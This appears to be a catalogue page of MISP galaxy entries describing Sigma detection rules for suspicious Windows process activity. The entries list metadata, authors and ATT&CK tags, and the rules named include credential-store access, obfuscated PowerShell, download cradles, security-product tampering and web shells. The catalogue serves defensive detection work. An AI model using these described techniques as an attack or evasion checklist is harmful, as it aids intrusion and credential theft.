Detects Obfuscated Powershell via Stdin in Scripts

Internal MISP references

UUID 9c14c9fa-1a63-4a64-8e57-d19280559490 which can be used as unique global reference for Invoke-Obfuscation Via Stdin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020-10-12
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Child Process of AspNetCompiler

Detects potentially suspicious child processes of "aspnet_compiler.exe".

Internal MISP references

UUID 9ccba514-7cb6-4c5c-b377-700758f2f120 which can be used as unique global reference for Suspicious Child Process of AspNetCompiler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-14
falsepositive ['Unknown']
filename proc_creation_win_aspnet_compiler_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Potential MSTSC Shadowing Activity

Detects RDP session hijacking by using MSTSC shadowing

Internal MISP references

UUID 6ba5a05f-b095-4f0a-8654-b825f4f16334 which can be used as unique global reference for Potential MSTSC Shadowing Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020-01-24
falsepositive ['Unknown']
filename proc_creation_win_mstsc_rdp_hijack_shadowing.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral-movement', 'attack.t1563.002']
Related clusters

To see the related clusters, click here.

Potential PowerShell Console History Access Attempt via History File

Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt). This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance.

Internal MISP references

UUID f4ff7323-b5fc-4323-8b52-6b9408e15788 which can be used as unique global reference for Potential PowerShell Console History Access Attempt via History File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Luc Génaux
creation_date 2025-04-03
falsepositive ['Legitimate access of the console history file is possible']
filename proc_creation_win_powershell_console_history_file_access.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Parameter Substring

Detects suspicious PowerShell invocation with a parameter substring

Internal MISP references

UUID 36210e0d-5b19-485d-a087-c096088885f0 which can be used as unique global reference for Suspicious PowerShell Parameter Substring in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
creation_date 2019-01-16
falsepositive ['Unknown']
filename proc_creation_win_powershell_susp_parameter_variation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Service StartupType Change Via Sc.EXE

Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"

Internal MISP references

UUID 85c312b7-f44d-4a51-a024-d671c40b49fc which can be used as unique global reference for Service StartupType Change Via Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-01
falsepositive ['False positives may occur with troubleshooting scripts']
filename proc_creation_win_sc_disable_service.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

SQL Client Tools PowerShell Session Detection

This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.

Internal MISP references

UUID a746c9b8-a2fb-4ee5-a428-92bee9e99060 which can be used as unique global reference for SQL Client Tools PowerShell Session Detection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Agro (@agro_sev) oscd.communitly
creation_date 2020-10-13
falsepositive ['Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action.']
filename proc_creation_win_mssql_sqltoolsps_susp_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense-evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Active Directory Structure Export Via Csvde.EXE

Detects the execution of "csvde.exe" in order to export organizational Active Directory structure.

Internal MISP references

UUID e5d36acd-acb4-4c6f-a13f-9eb203d50099 which can be used as unique global reference for Active Directory Structure Export Via Csvde.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-03-14
falsepositive ['Unknown']
filename proc_creation_win_csvde_export.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.discovery', 'attack.t1087.002']
Related clusters

To see the related clusters, click here.

Suspicious Manipulation Of Default Accounts Via Net.EXE

Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc

Internal MISP references

UUID 5b768e71-86f2-4879-b448-81061cbae951 which can be used as unique global reference for Suspicious Manipulation Of Default Accounts Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-09-01
falsepositive ['Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium']
filename proc_creation_win_net_user_default_accounts_manipulation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

Hardware Model Reconnaissance Via Wmic.EXE

Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information

Internal MISP references

UUID 3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d which can be used as unique global reference for Hardware Model Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023-02-14
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_csproduct.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'car.2016-03-002']
Related clusters

To see the related clusters, click here.

Remote Access Tool - UltraViewer Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 88656cec-6c3b-487c-82c0-f73ebb805503 which can be used as unique global reference for Remote Access Tool - UltraViewer Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-09-25
falsepositive ['Legitimate use']
filename proc_creation_win_remote_access_tools_ultraviewer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

Use of OpenConsole

Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting

Internal MISP references

UUID 814c95cc-8192-4378-a70a-f1aafd877af1 which can be used as unique global reference for Use of OpenConsole in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-06-16
falsepositive ['Legitimate use by an administrator']
filename proc_creation_win_lolbin_openconsole.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Curl Web Request With Potential Custom User-Agent

Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings

Internal MISP references

UUID 85de1f22-d189-44e4-8239-dc276b45379b which can be used as unique global reference for Curl Web Request With Potential Custom User-Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-07-27
falsepositive ['Unknown']
filename proc_creation_win_curl_custom_user_agent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

NtdllPipe Like Activity Execution

Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe

Internal MISP references

UUID bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2 which can be used as unique global reference for NtdllPipe Like Activity Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-03-05
falsepositive ['Unknown']
filename proc_creation_win_cmd_ntdllpipe_redirect.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion']

Suspicious File Encoded To Base64 Via Certutil.EXE

Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious

Internal MISP references

UUID ea0cdc3e-2239-4f26-a947-4e8f8224e464 which can be used as unique global reference for Suspicious File Encoded To Base64 Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-15
falsepositive ['Unknown']
filename proc_creation_win_certutil_encode_susp_extensions.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Potential SysInternals ProcDump Evasion

Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name

Internal MISP references

UUID 79b06761-465f-4f88-9ef2-150e24d3d737 which can be used as unique global reference for Potential SysInternals ProcDump Evasion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-01-11
falsepositive ['False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming']
filename proc_creation_win_sysinternals_procdump_evasion.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036', 'attack.t1003.001', 'attack.credential-access']
Related clusters

To see the related clusters, click here.

Taskmgr as LOCAL_SYSTEM

Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM

Internal MISP references

UUID 9fff585c-c33e-4a86-b3cd-39312079a65f which can be used as unique global reference for Taskmgr as LOCAL_SYSTEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018-03-18
falsepositive ['Unknown']
filename proc_creation_win_taskmgr_localsystem.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Windows Credential Manager Access via VaultCmd

List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe

Internal MISP references

UUID 58f50261-c53b-4c88-bd12-1d71f12eda4c which can be used as unique global reference for Windows Credential Manager Access via VaultCmd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-04-08
falsepositive ['Unknown']
filename proc_creation_win_vaultcmd_list_creds.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1555.004']
Related clusters

To see the related clusters, click here.

Firewall Rule Deleted Via Netsh.EXE

Detects the removal of a port or application rule in the Windows Firewall configuration using netsh

Internal MISP references

UUID 1a5fefe6-734f-452e-a07d-fc1c35bce4b2 which can be used as unique global reference for Firewall Rule Deleted Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-08-14
falsepositive ['Legitimate administration activity', 'Software installations and removal']
filename proc_creation_win_netsh_fw_delete_rule.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Suspicious Extrac32 Alternate Data Stream Execution

Extract data from cab file and hide it in an alternate data stream

Internal MISP references

UUID 4b13db67-0c45-40f1-aba8-66a1a7198a1e which can be used as unique global reference for Suspicious Extrac32 Alternate Data Stream Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-11-26
falsepositive ['Unknown']
filename proc_creation_win_lolbin_extrac32_ads.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Suspicious Execution of Powershell with Base64

Commandline to launch powershell with a base64 payload

Internal MISP references

UUID fb843269-508c-4b76-8b8d-88679db22ce7 which can be used as unique global reference for Suspicious Execution of Powershell with Base64 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-02
falsepositive ['Unknown']
filename proc_creation_win_powershell_encode.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potential File Download Via MS-AppInstaller Protocol Handler

Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"

Internal MISP references

UUID 180c7c5c-d64b-4a63-86e9-68910451bc8b which can be used as unique global reference for Potential File Download Via MS-AppInstaller Protocol Handler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
creation_date 2023-11-09
falsepositive ['Unknown']
filename proc_creation_win_susp_ms_appinstaller_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Electron Application Child Processes

Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)

Internal MISP references

UUID f26eb764-fd89-464b-85e2-dc4a8e6e77b8 which can be used as unique global reference for Suspicious Electron Application Child Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-10-21
falsepositive ['Unknown']
filename proc_creation_win_susp_electron_app_children.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Script Execution From Temp Folder

Detects a suspicious script executions from temporary folder

Internal MISP references

UUID a6a39bdb-935c-4f0a-ab77-35f4bbf44d33 which can be used as unique global reference for Suspicious Script Execution From Temp Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
creation_date 2021-07-14
falsepositive ['Administrative scripts']
filename proc_creation_win_susp_script_exec_from_temp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

HackTool - SafetyKatz Execution

Detects the execution of the hacktool SafetyKatz via PE information and default Image name

Internal MISP references

UUID b1876533-4ed5-4a83-90f3-b8645840a413 which can be used as unique global reference for HackTool - SafetyKatz Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-10-20
falsepositive ['Unlikely']
filename proc_creation_win_hktl_safetykatz.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Suspicious Process Masquerading As SvcHost.EXE

Detects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location. Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection.

Internal MISP references

UUID be58d2e2-06c8-4f58-b666-b99f6dc3b6cd which can be used as unique global reference for Suspicious Process Masquerading As SvcHost.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2024-08-07
falsepositive ['Unlikely']
filename proc_creation_win_svchost_masqueraded_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036.005']
Related clusters

To see the related clusters, click here.

Computer Password Change Via Ksetup.EXE

Detects password change for the computer's domain account or host principal via "ksetup.exe"

Internal MISP references

UUID de16d92c-c446-4d53-8938-10aeef41c8b6 which can be used as unique global reference for Computer Password Change Via Ksetup.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-04-06
falsepositive ['Unknown']
filename proc_creation_win_ksetup_password_change_computer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Windows Service Tampering

Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts

Internal MISP references

UUID ce72ef99-22f1-43d4-8695-419dcb5d9330 which can be used as unique global reference for Suspicious Windows Service Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113 , X__Junior (Nextron Systems)
creation_date 2022-09-01
falsepositive ['Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry']
filename proc_creation_win_susp_service_tamper.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.impact', 'attack.t1489', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Data Export From MSSQL Table Via BCP.EXE

Detects the execution of the BCP utility in order to export data from the database. Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file.

Internal MISP references

UUID c615d676-f655-46b9-b913-78729021e5d7 which can be used as unique global reference for Data Export From MSSQL Table Via BCP.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Omar Khaled (@beacon_exe), MahirAli Khan (in/mahiralikhan), Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-08-20
falsepositive ['Legitimate data export operations.']
filename proc_creation_win_bcp_export_data.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.exfiltration', 'attack.t1048']
Related clusters

To see the related clusters, click here.

Suspicious Child Process Of Wermgr.EXE

Detects suspicious Windows Error Reporting manager (wermgr.exe) child process

Internal MISP references

UUID 396f6630-f3ac-44e3-bfc8-1b161bc00c4e which can be used as unique global reference for Suspicious Child Process Of Wermgr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-10-14
falsepositive ['Unknown']
filename proc_creation_win_wermgr_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Powershell Defender Exclusion

Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets

Internal MISP references

UUID 17769c90-230e-488b-a463-e05c08e9d48f which can be used as unique global reference for Powershell Defender Exclusion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-04-29
falsepositive ['Possible Admin Activity', 'Other Cmdlets that may use the same parameters']
filename proc_creation_win_powershell_defender_exclusion.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

HackTool - ADCSPwn Execution

Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service

Internal MISP references

UUID cd8c163e-a19b-402e-bdd5-419ff5859f12 which can be used as unique global reference for HackTool - ADCSPwn Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-07-31
falsepositive ['Unlikely']
filename proc_creation_win_hktl_adcspwn.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.credential-access', 'attack.t1557.001']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Execution Of PDQDeployRunner

Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines

Internal MISP references

UUID 12b8e9f5-96b2-41e1-9a42-8c6779a5c184 which can be used as unique global reference for Potentially Suspicious Execution Of PDQDeployRunner in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-22
falsepositive ['Legitimate use of the PDQDeploy tool to execute these commands']
filename proc_creation_win_pdqdeploy_runner_susp_children.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Sysinternals PsSuspend Execution

Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes

Internal MISP references

UUID 48bbc537-b652-4b4e-bd1d-281172df448f which can be used as unique global reference for Sysinternals PsSuspend Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-03-23
falsepositive ['Unknown']
filename proc_creation_win_sysinternals_pssuspend_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.discovery', 'attack.persistence', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Suspicious Service Path Modification

Detects service path modification via the "sc" binary to a suspicious command or path

Internal MISP references

UUID 138d3531-8793-4f50-a2cd-f291b2863d78 which can be used as unique global reference for Suspicious Service Path Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019-10-21
falsepositive ['Unlikely']
filename proc_creation_win_sc_service_path_modification.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Renamed Vmnat.exe Execution

Detects renamed vmnat.exe or portable version that can be used for DLL side-loading

Internal MISP references

UUID 7b4f794b-590a-4ad4-ba18-7964a2832205 which can be used as unique global reference for Renamed Vmnat.exe Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author elhoim
creation_date 2022-09-09
falsepositive ['Unknown']
filename proc_creation_win_renamed_vmnat.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1574.001']
Related clusters

To see the related clusters, click here.

PowerShell Get-Clipboard Cmdlet Via CLI

Detects usage of the 'Get-Clipboard' cmdlet via CLI

Internal MISP references

UUID b9aeac14-2ffd-4ad3-b967-1354a4e628c3 which can be used as unique global reference for PowerShell Get-Clipboard Cmdlet Via CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2020-05-02
falsepositive ['Unknown']
filename proc_creation_win_powershell_get_clipboard.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1115']
Related clusters

To see the related clusters, click here.

Potential COM Objects Download Cradles Usage - Process Creation

Detects usage of COM objects that can be abused to download files in PowerShell by CLSID

Internal MISP references

UUID 02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf which can be used as unique global reference for Potential COM Objects Download Cradles Usage - Process Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-12-25
falsepositive ['Legitimate use of the library']
filename proc_creation_win_powershell_download_com_cradles.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Suspicious Process By Web Server Process

Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation

Internal MISP references

UUID 8202070f-edeb-4d31-a010-a26c72ac5600 which can be used as unique global reference for Suspicious Process By Web Server Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019-01-16
falsepositive ['Particular web applications may spawn a shell process legitimately']
filename proc_creation_win_webshell_susp_process_spawned_from_webserver.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.initial-access', 'attack.t1505.003', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Suspicious Schtasks Schedule Types

Detects scheduled task creations or modification on a suspicious schedule type

Internal MISP references

UUID 24c8392b-aa3c-46b7-a545-43f71657fe98 which can be used as unique global reference for Suspicious Schtasks Schedule Types in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-09-09
falsepositive ['Legitimate processes that run at logon. Filter according to your environment']
filename proc_creation_win_schtasks_schedule_type.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.execution', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Delete All Scheduled Tasks

Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.

Internal MISP references

UUID 220457c1-1c9f-4c2e-afe6-9598926222c1 which can be used as unique global reference for Delete All Scheduled Tasks in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-09-09
falsepositive ['Unlikely']
filename proc_creation_win_schtasks_delete_all.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.

BitLockerTogo.EXE Execution

Detects the execution of "BitLockerToGo.EXE". BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system. This is a rarely used application and usage of it at all is worth investigating. Malware such as Lumma stealer has been seen using this process as a target for process hollowing.

Internal MISP references

UUID 7f2376f9-42ee-4dfc-9360-fecff9a88fc8 which can be used as unique global reference for BitLockerTogo.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Josh Nickels, mttaggart
creation_date 2024-07-11
falsepositive ['Legitimate usage of BitLockerToGo.exe to encrypt portable devices.']
filename proc_creation_win_bitlockertogo_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script

Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state

Internal MISP references

UUID 7aa4e81a-a65c-4e10-9f81-b200eb229d7d which can be used as unique global reference for Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-06-14
falsepositive ['Unknown']
filename proc_creation_win_vmware_toolbox_cmd_persistence.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Potential Tampering With Security Products Via WMIC

Detects uninstallation or termination of security products using the WMIC utility

Internal MISP references

UUID 847d5ff3-8a31-4737-a970-aeae8fe21765 which can be used as unique global reference for Potential Tampering With Security Products Via WMIC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021-01-30
falsepositive ['Legitimate administration']
filename proc_creation_win_wmic_uninstall_security_products.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Suspicious Activity Using SeCEdit

Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy

Internal MISP references

UUID c2c76b77-32be-4d1f-82c9-7e544bdfe0eb which can be used as unique global reference for Potential Suspicious Activity Using SeCEdit in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe
creation_date 2022-11-18
falsepositive ['Legitimate administrative use']
filename proc_creation_win_secedit_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.discovery', 'attack.persistence', 'attack.defense-evasion', 'attack.credential-access', 'attack.privilege-escalation', 'attack.t1562.002', 'attack.t1547.001', 'attack.t1505.005', 'attack.t1556.002', 'attack.t1562', 'attack.t1574.007', 'attack.t1564.002', 'attack.t1546.008', 'attack.t1546.007', 'attack.t1547.014', 'attack.t1547.010', 'attack.t1547.002', 'attack.t1557', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Arbitrary File Download Via Squirrel.EXE

Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)

Internal MISP references

UUID 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c which can be used as unique global reference for Arbitrary File Download Via Squirrel.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
creation_date 2022-06-09
falsepositive ['Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)']
filename proc_creation_win_squirrel_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

